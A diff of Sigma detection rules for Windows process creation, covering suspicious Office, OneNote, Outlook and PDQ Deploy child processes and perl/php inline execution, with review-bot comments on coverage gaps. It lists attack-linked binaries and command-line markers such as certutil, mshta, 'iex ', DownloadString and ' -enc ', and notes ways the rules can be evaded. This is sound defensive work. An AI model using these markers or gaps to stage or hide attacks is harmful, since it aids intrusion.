@@ -24,26 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use ParentImage|endswith: - \explorer.exe - \dopus.exe selection_img: - - Image|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - Image|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_trusted_location: - CommandLine|contains: + CommandLine|contains: + # Note: these are the default locations. Admins/Users could add additional ones that you need to cover - \AppData\Roaming\Microsoft\Templates - \AppData\Roaming\Microsoft\Word\Startup\ - \Microsoft Office\root\Templates\ - \Microsoft Office\Templates\ filter_main_dotx: - CommandLine|endswith: + # Note: We add this filter to avoid curious people clicking on template files + CommandLine|endswith: - .dotx - .xltx - .potx diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml index cc871d3e1..28a0bff90 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml 
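Review bot: `filter_main_dotx` matches with `CommandLine|endswith`, so it only suppresses launches where the template path is the final, unquoted token of the command line; an invocation that ends with a closing quote or a trailing switch still fires, which is fail-safe but makes the added `# Note: We add this filter to avoid curious people clicking on template files` comment overstate what is filtered. If the list continues past the hunk with quoted variants such as `.dotx"`, disregard; otherwise either add them or extend the comment with `# Only matches when the template path is the last unquoted argument`. The filter block and the rule's `condition` end outside this hunk.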
@@ -1,17 +1,14 @@ title: Suspicious Microsoft OneNote Child Process id: c27515df-97a9-4162-8a60-dc0eeb51b775 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes + type: derived status: test -description: Detects suspicious child processes of the Microsoft OneNote application. - This may indicate an attempt to execute malicious embedded objects from a .one - file. +description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18 - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 -author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic - (idea) +author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) date: 2022/10/21 modified: 2023/02/10 tags: 
@@ -29,79 +26,79 @@ detection: selection_parent: ParentImage|endswith: \onenote.exe selection_opt_img: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - Image|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - Image|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - \ieexec.exe + - 
\installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe selection_opt_explorer: Image|endswith: \explorer.exe - CommandLine|contains: + CommandLine|contains: - .hta - .vb - .wsh @@ -121,13 +118,12 @@ detection: - \Windows\System32\Tasks\ filter_teams: Image|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe - CommandLine|endswith: -Embedding + CommandLine|endswith: -Embedding filter_onedrive: Image|contains: \AppData\Local\Microsoft\OneDrive\ Image|endswith: \FileCoAuth.exe - CommandLine|endswith: -Embedding - condition: process_creation and (selection_parent and 1 of selection_opt_* and - not 1 of filter_*) + CommandLine|endswith: -Embedding + condition: process_creation and (selection_parent and 1 of selection_opt_* and not 1 of filter_*) falsepositives: - File located in the AppData folder with trusted signature level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml index 71211abc7..e0286dc5f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml 
@@ -1,11 +1,10 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled id: 55f0a3a1-846e-40eb-8273-677371b8d912 related: - - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 - type: similar + - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation + type: similar status: test -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 @@ -26,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules + CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml index de696494e..3209d8bed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml 
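Review bot: `selection` requires the contiguous string `\Outlook\Security\EnableUnsafeClientMailRules`, so the rule only fires when the value name is written as part of the key path; tooling that passes the key and the value name as separate arguments never produces that substring, leaving the related registry rule `6763c6c8-bd01-4687-bc8d-4fa52cf8ba08` as the only coverage. A `CommandLine|contains|all` with `- \Outlook\Security` and `- EnableUnsafeClientMailRules` keeps the intent while covering both spellings. The `# Registry variation` comment added on the `related` entry is a good cue; mirroring it with `# Process-creation variation` in the registry rule would make the pair discoverable from either side.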
@@ -1,17 +1,16 @@ title: Suspicious Outlook Child Process id: 208748f7-881d-47ac-a29c-07ea84bf691d related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: e212d415-0e93-435f-9e1a-f29005bb4723 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes + type: derived + - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process + type: derived status: test description: Detects a suspicious process spawning from an Outlook process. references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye - Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2022/02/28 modified: 2023/02/04 tags: @@ -35,8 +34,8 @@ detection: - \forfiles.exe - \hh.exe - \mftrace.exe - - \msbuild.exe - - \msdt.exe + - \msbuild.exe # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml + - \msdt.exe # CVE-2022-30190 - \mshta.exe - \msiexec.exe - \powershell.exe 
@@ -46,9 +45,22 @@ detection: - \scrcons.exe - \scriptrunner.exe - \sh.exe - - \svchost.exe - - \wmic.exe + - \svchost.exe # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe + # Several FPs with rundll32.exe + # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely + # - '\rundll32.exe' + # filter_outlook_photoviewer: # https://twitter.com/Luke_Hamp/status/1495919717760237568 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains: '\PhotoViewer.dll' + # filter_outlook_printattachments: # https://twitter.com/KickaKamil/status/1496238278659485696 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains|all: + # - 'shell32.dll,Control_RunDLL' + # - '\SYSTEM32\SPOOL\DRIVERS\' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml index 75b0e2f27..00efa0f78 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml 
@@ -1,11 +1,10 @@ title: Suspicious Remote Child Process From Outlook id: e212d415-0e93-435f-9e1a-f29005bb4723 related: - - id: 208748f7-881d-47ac-a29c-07ea84bf691d - type: similar + - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes + type: similar status: test -description: Detects a suspicious child process spawning from Outlook where the image - is located in a remote location (SMB/WebDav shares). +description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). references: - https://github.com/sensepost/ruler - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml b/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml index 93179affe..37eea8f96 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml @@ -1,8 +1,7 @@ title: Suspicious Binary In User Directory Spawned From Office Application id: aa3a6f94-890e-4e22-b634-ffdfd54792cc status: test -description: Detects an executable in the users directory started from one of the - Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) references: - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 @@ -31,6 +30,7 @@ detection: - \VISIO.exe - \MSACCESS.exe - \EQNEDT32.exe + # - '\OUTLOOK.EXE' too many FPs Image|startswith: C:\users\ Image|endswith: .exe filter: 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml index 20d62d326..b4e5d38a4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml @@ -1,19 +1,18 @@ title: Suspicious Microsoft Office Child Process id: 438025f9-5856-4663-83f7-52f878a70a50 related: - - id: c27515df-97a9-4162-8a60-dc0eeb51b775 - type: derived - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 - type: obsoletes - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Speicifc OneNote rule due to its recent usage in phishing attacks + type: derived + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 + type: obsoletes + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Detects a suspicious process spawning from one of the Microsoft Office - suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html 
@@ -26,8 +25,7 @@ references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ -author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, - Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io date: 2018/04/06 modified: 2023/04/24 tags: 
@@ -57,77 +55,77 @@ detection: - \wordpad.exe - \wordview.exe selection_child_processes: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - Image|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe - selection_child_susp_paths: + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - Image|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - 
\ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe + selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142) Image|contains: - \AppData\ - \Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml index 943e7bc94..20b00b840 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml @@ -1,11 +1,10 @@ title: Potential Arbitrary DLL Load Using Winword id: f7375e28-5c14-432f-b8d1-1db26c832df3 related: - - id: 2621b3a6-3840-4810-ac14-a02426086171 - type: obsoletes + - id: 2621b3a6-3840-4810-ac14-a02426086171 + type: obsoletes status: test -description: Detects potential DLL sideloading using the Microsoft Office winword - process via the '/l' flag. +description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. references: - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py author: Victor Sergeev, oscd.community 
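Review bot: The `OriginalFileName` list in `selection_child_processes` is narrower than the `Image|endswith` list beneath it — `\bash.exe`, `\forfiles.exe`, `\msbuild.exe`, `\pwsh.exe`, `\svchost.exe` and `\verclsid.exe`, among others, have no `OriginalFileName` counterpart, so for those binaries the rule only fires while the on-disk name is unchanged. The hunk only re-indents, but with both lists in view it is a good moment to bring them into line, for instance by adding `- pwsh.dll` (the value the PowerShell rules later in this patch use) and the original names of the other entries where they are known. Where no stable original name is known, a comment such as `# no OriginalFileName counterpart; matched on Image only` next to the Image entry would make the gap deliberate rather than accidental. The detection block continues past the end of the hunk.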
@@ -23,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WINWORD.exe
- - OriginalFileName: WinWord.exe
+ - Image|endswith: \WINWORD.exe
+ - OriginalFileName: WinWord.exe
 selection_dll:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - '/l '
 - .dll
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml b/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml
index 2a344c226..8ff359b48 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml
@@ -1,13 +1,9 @@
 title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
 id: 02b18447-ea83-4b1b-8805-714a8a34546a
 status: test
-description: 'Detects execution of Windows Defender "OfflineScannerShell.exe" from
- its non standard directory.
-
- The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will
- load any DLL named "mpclient.dll" from the current working directory.
-
- '
+description: |
+ Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory.
+ The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/
 author: frack113
@@ -25,14 +21,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - Image|endswith: \OfflineScannerShell.exe
- - OriginalFileName: OfflineScannerShell.exe
+ - Image|endswith: \OfflineScannerShell.exe
+ - OriginalFileName: OfflineScannerShell.exe
 filter_main_legit_dir:
 CurrentDirectory: C:\Program Files\Windows Defender\Offline\
 filter_main_empty:
 CurrentDirectory: ''
 filter_main_null:
- CurrentDirectory: null
+ CurrentDirectory:
 condition: process_creation and (selection and not 1 of filter_main_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml
index a2df926be..7561c114b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml
@@ -1,8 +1,8 @@
 title: PDQ Deploy Remote Adminstartion Tool Execution
 id: d679950c-abb7-43a6-80fb-2a480c4fc450
 related:
- - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184
- type: similar
+ - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184
+ type: similar
 status: test
 description: Detect use of PDQ Deploy remote admin tool
 references:
@@ -24,10 +24,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - Description: PDQ Deploy Console
- - Product: PDQ Deploy
- - Company: PDQ.com
- - OriginalFileName: PDQDeployConsole.exe
+ - Description: PDQ Deploy Console
+ - Product: PDQ Deploy
+ - Company: PDQ.com
+ - OriginalFileName: PDQDeployConsole.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
index daf207356..9f2eb78a2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
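Review bot: `filter_main_null` now reads `CurrentDirectory:` with no value; YAML parses an empty value as null, so the filter behaves as before, but next to `filter_main_empty`'s explicit `''` the bare key looks like an accidentally truncated line. Keep the intent visible with `CurrentDirectory: null`, or, if the generator drops the literal on purpose, add a trailing `# null` comment so a reader does not "fix" it to an empty string and merge the two filters. The rest of the rule (title, references, level) is outside this hunk.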
+++ b/sigma/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml @@ -1,12 +1,10 @@ title: Suspicious Execution Of PDQDeployRunner id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 related: - - id: d679950c-abb7-43a6-80fb-2a480c4fc450 - type: similar + - id: d679950c-abb7-43a6-80fb-2a480c4fc450 + type: similar status: test -description: Detects suspicious execution of "PDQDeployRunner" which is part of the - PDQDeploy service stack that is responsible for executing commands and packages - on a remote machines +description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines references: - https://twitter.com/malmoeb/status/1550483085472432128 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -24,35 +22,37 @@ detection: selection_parent: ParentImage|contains: PDQDeployRunner- selection_susp: - - Image|endswith: - - \wscript.exe - - \cscript.exe - - \rundll32.exe - - \regsvr32.exe - - \wmic.exe - - \msiexec.exe - - \mshta.exe - - \csc.exe - - \dllhost.exe - - \certutil.exe - - \scriptrunner.exe - - \bash.exe - - \wsl.exe - - Image|contains: - - C:\Users\Public\ - - C:\ProgramData\ - - C:\Windows\TEMP\ - - \AppData\Local\Temp - - CommandLine|contains: - - 'iex ' - - Invoke- - - DownloadString - - http - - ' -enc ' - - ' -encodedcommand ' - - FromBase64String - - ' -decode ' - - ' -w hidden' + # Improve this section by adding other suspicious processes, commandlines or paths + - Image|endswith: + # If you use any of the following processes legitimately comment them out + - \wscript.exe + - \cscript.exe + - \rundll32.exe + - \regsvr32.exe + - \wmic.exe + - \msiexec.exe + - \mshta.exe + - \csc.exe + - \dllhost.exe + - \certutil.exe + - \scriptrunner.exe + - \bash.exe + - \wsl.exe + - Image|contains: + - C:\Users\Public\ + - C:\ProgramData\ + - C:\Windows\TEMP\ + - \AppData\Local\Temp + - CommandLine|contains: + - 'iex ' + - Invoke- + - DownloadString + - http + - ' -enc ' + - ' -encodedcommand ' + - FromBase64String + - ' -decode ' + - ' -w hidden' condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the PDQDeploy tool to execute these commands diff --git a/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml index 9a21533dd..41d533b53 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml 
@@ -1,8 +1,7 @@
 title: Perl Inline Command Execution
 id: f426547a-e0f7-441a-b63e-854ac5bdf54d
 status: test
-description: Detects execution of perl using the "-e"/"-E" flags. This is could be
- used as a way to launch a reverse shell or execute live perl code.
+description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
 references:
 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 - https://www.revshells.com/
@@ -20,10 +19,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \perl.exe
- - OriginalFileName: perl.exe
+ - Image|endswith: \perl.exe
+ - OriginalFileName: perl.exe # Also covers perlX.XX.exe
 selection_cli:
- CommandLine|contains: ' -e'
+ CommandLine|contains: ' -e'
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml
index b0da970e3..6d60b571c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml
@@ -1,8 +1,7 @@
 title: Php Inline Command Execution
 id: d81871ef-5738-47ab-9797-7a9c90cd4bfb
 status: test
-description: Detects execution of php using the "-r" flag. This is could be used as
- a way to launch a reverse shell or execute live php code.
+description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
 references:
 - https://www.php.net/manual/en/features.commandline.php
 - https://www.revshells.com/
@@ -21,10 +20,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \php.exe
- - OriginalFileName: php.exe
+ - Image|endswith: \php.exe
+ - OriginalFileName: php.exe
 selection_cli:
- CommandLine|contains: ' -r'
+ CommandLine|contains: ' -r'
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml
index 17521d4d5..370b6d8a8 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml
@@ -22,7 +22,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \ping.exe
- CommandLine|contains: 0x
+ CommandLine|contains: 0x
 condition: process_creation and selection
 fields:
 - ParentCommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml
index 8607cd77e..aecd8a96b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_pktmon_execution.yml
@@ -19,8 +19,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - Image|endswith: \pktmon.exe
- - OriginalFileName: PktMon.exe
+ - Image|endswith: \pktmon.exe
+ - OriginalFileName: PktMon.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use
